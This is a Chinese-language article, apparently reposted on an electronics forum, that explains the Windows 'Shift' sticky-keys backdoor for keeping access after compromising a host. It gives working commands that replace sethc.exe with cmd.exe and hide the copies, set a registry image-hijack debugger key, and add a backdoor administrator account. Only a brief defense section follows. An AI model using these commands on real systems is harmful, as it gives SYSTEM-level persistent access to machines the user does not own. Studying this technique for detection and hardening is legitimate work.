0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

Windows Shift后门利用

jf_hKIAo4na ? 来源:Mi1k7ea ? 2023-01-30 10:38 ? 次阅读
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

0x00 前言

通常,在内网渗透打下一台机子之后,可以给这台机子留个Shift后门。

0x01 Shift后门利用

简介

粘滞键漏洞,在Windows系统下连续按5下SHIFT键,可以启动系统的粘滞键功能,其进程名为Sethc.exe,应用程序在Windowssystem32下。

黑客用其它应用程序(如:cmd.exe、explorer.exe 或木马、病毒)将Sethc.exe替换。当再次连续按5次SHIFT键,就会启动黑客替换的应用程序,如此便留下了5下SHIFT后门,黑客3389登录远程计算机时,在用户登录界面,连续按5下SHIFT就可以启动该漏洞,进而控制远程计算机。

漏洞原理

在Windows系统登录界面状态下,粘滞键仍可以以连续按5下SHIFT键运行,并且此时应用程序会以WINDOWS的最高权限-SYSTEM权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算机。

漏洞利用

大致思路如下:

拿到目标主机权限后,到Windowssystem32目录下,将sethc.exe替换成cmd.exe;

其中,命令行方式为:

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意:要将dllcache文件夹中的缓存删掉,否则会自动复原回去。

注册表方式为:

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令说明:reg add是向注册表添加记录,后面跟的是注册表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的缩写。Image File Execution Option这个目录是用来设置镜像劫持的,要被劫持的就是命令中的sethc粘滞键程序,随后通过/ v来指定键名,其中键名debugger是固定的,然后通过/ t来指定REG_SZ字符串类型,最后通过/ d来指定键的值,即被恶意替换的程序cmd.exe。

这样,在下次远程连接目标主机登录的时候就可以连续5下SHIFT触发cmd.exe;

可以输入explorer.exe调出程序管理系统方便操作;

当然,上面的方法存在缺陷,就是可能会导致远程连接无法持久进行,因此可以直接添加新用户便于下次直接登录:

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系统盘为NTFS文件系统,可以将sytem32下的sethc.exe文件设为everyone拒绝访问;

直接将其删除,最好的方法是在控制面板-辅助功能选项-粘滞键选项,将“使用快捷键”取消即可。;

通过注册表设置实现防御;

审核编辑 :李倩

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • WINDOWS
    +关注

    关注

    4

    文章

    3618

    浏览量

    91773
  • 应用程序
    +关注

    关注

    38

    文章

    3339

    浏览量

    59230
  • Shift
    +关注

    关注

    0

    文章

    5

    浏览量

    7587

原文标题:Windows Shift后门利用

文章出处:【微信号:菜鸟学安全,微信公众号:菜鸟学安全】欢迎添加关注!文章转载请注明出处。

收藏 人收藏
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

    评论

    相关推荐
    热点推荐

    你的手机在监听!国安部曝光境外芯片可能暗藏“后门

    电子发烧友网报道(文/黄山明)如果家中门锁有一把钥匙掌握在自己不知道的人手中,相信住在里面的人也不会安心。如果是芯片被安装了“后门”,那么被保存在其中的资料,自然存在泄露的风险。近期,国家安全部公开
    的头像 发表于 07-22 07:31 ?5526次阅读

    英伟达被约谈!“后门”风险阴影下,人脸识别终端为何选国产芯片

    7月31日消息,为维护中国用户网络安全、数据安全,国家互联网信息办公室已约谈英伟达,要求英伟达公司就对华销售的H20算力芯片漏洞后门安全风险问题进行说明,并提交相关证明材料。英伟达芯片是否存在芯片
    的头像 发表于 08-08 09:43 ?206次阅读
    英伟达被约谈!“<b class='flag-5'>后门</b>”风险阴影下,人脸识别终端为何选国产芯片

    国安部:境外产芯片或故意留“后门

    根据国家安全部微信公众号发布的消息,我们发现居然有境外产芯片或故意留“后门”。 当心你身边的“隐形窃密通道” 在如今高度数字化的时代,网络安全的重要性愈发凸显,不仅关乎着个人隐私、企业秘密,甚至
    的头像 发表于 07-21 11:47 ?1745次阅读

    今日看点丨国安部:境外生产芯片可能留“后门” 摄像头被远程开启;英特尔终止了对 Clear Linux 的支持;宇

    ? ? ? 1、国安部:境外生产芯片可能留“后门”?摄像头被远程开启 据国家安全部官微消息,一些境外生产的芯片、智能设备或者软件可能在设计制造阶段就被故意预埋了后门,厂商可以通过特定信号对设备进行
    发表于 07-21 10:51 ?1945次阅读
    今日看点丨国安部:境外生产芯片可能留“<b class='flag-5'>后门</b>” 摄像头被远程开启;英特尔终止了对 Clear Linux 的支持;宇

    国产海光OPS电脑怎样快速切换windows和国产麒麟统信系统

    WINDOWS
    深圳双芯信息科技有限公司
    发布于 :2025年06月23日 12:40:57

    Xilinx Shift RAM IP概述和主要功能

    Xilinx Shift RAM IP 是 AMD Xilinx 提供的一个 LogiCORE IP 核,用于在 FPGA 中实现高效的移位寄存器(Shift Register)。该 IP 核利用
    的头像 发表于 05-14 09:36 ?495次阅读

    DLP4500如何自动产生graycode和phase shift pattern?

    我在看DLP的sdk介绍和解析中说,DLP4500可以自动产生graycode和phase shift pattern,但是我没有找到方法。 请问要怎么实现呢?具体的步骤是什么? 期待得到回复!谢谢
    发表于 02-27 08:19

    dlpc3433是否支持通过pixel shift来实现atw的功能?

    dlpc3433是否支持通过pixel shift来实现atw的功能,已帮助改善拖影和color break问题
    发表于 02-26 08:19

    windows搭建ftp服务器的步骤

    Windows系统上搭建FTP(文件传输协议)服务器通常涉及一系列步骤,包括安装必要的服务、配置服务器设置、以及确保网络安全设置允许FTP流量。 一、准备工作 确定操作系统版本 : 确保你
    的头像 发表于 02-01 15:49 ?1543次阅读

    hyper shift,hyper-v的正确关闭步骤

    步骤? ? ?Windows10系统,通过控制面板卸载,打开“控制面板”,可以通过左下方的开始菜单或任务栏搜索找到。选择“程序和功能”。点击“启用或关闭Windows功能”。在打开的窗口中,找到“Hyper-V”选项,取消勾选。点击“确定”,等待系统完成卸载。 ? ?
    的头像 发表于 01-23 11:09 ?1129次阅读
    hyper <b class='flag-5'>shift</b>,hyper-v的正确关闭步骤

    2024 Commvault SHIFT全球巡演中国站完美收官

    近日,2024 Commvault SHIFT全球巡演 · 中国站完美收官。大会汇聚数据安全和管理领域的知名专家、业务掌舵人和生态伙伴,聚焦混合云趋势下的数据保护需求变革,探讨企业如何借助创新平台驱动全新范式,成就持续业务的竞争优势,呈现了一场思想和技术的盛宴。
    的头像 发表于 12-10 16:44 ?944次阅读

    Windows 10将于2025年终止免费更新,微软力推Windows 11

    近日,微软在其官方网站上发布了一则通知,宣布自2025年10月14日起,将正式停止为Windows 10操作系统提供来自Windows更新的免费软件更新、技术支持以及安全修复程序。这一决定意味着
    的头像 发表于 11-05 10:35 ?1822次阅读

    Commvault SHIFT全球线上大会圆满落幕

    近日,Commvault SHIFT全球线上大会圆满落幕。大会上,Commvault发布了一系列面向持续业务的平台新功能,并携手行业专家畅谈云优先时代的弹性趋势。Commvault总裁兼首席执行官
    的头像 发表于 10-21 11:32 ?779次阅读

    Windows管理内存的三种主要方式

    Windows操作系统提供了多种方式来管理内存,以确保系统资源的有效利用和性能的优化。以下是关于Windows管理内存的三种主要方式的详细阐述,包括堆内存管理、虚拟内存管理以及共享内存管理,每种方式都将从概念、原理、运作机制和应
    的头像 发表于 10-12 17:09 ?2578次阅读

    Credo发布HiWire SHIFT AEC新品

    该新系列SHIFT AEC产品是基于Credo先进的800G HiWire AEC设计优化而来,能效卓越,性能更佳,且具有极致的可靠性
    的头像 发表于 09-12 14:07 ?701次阅读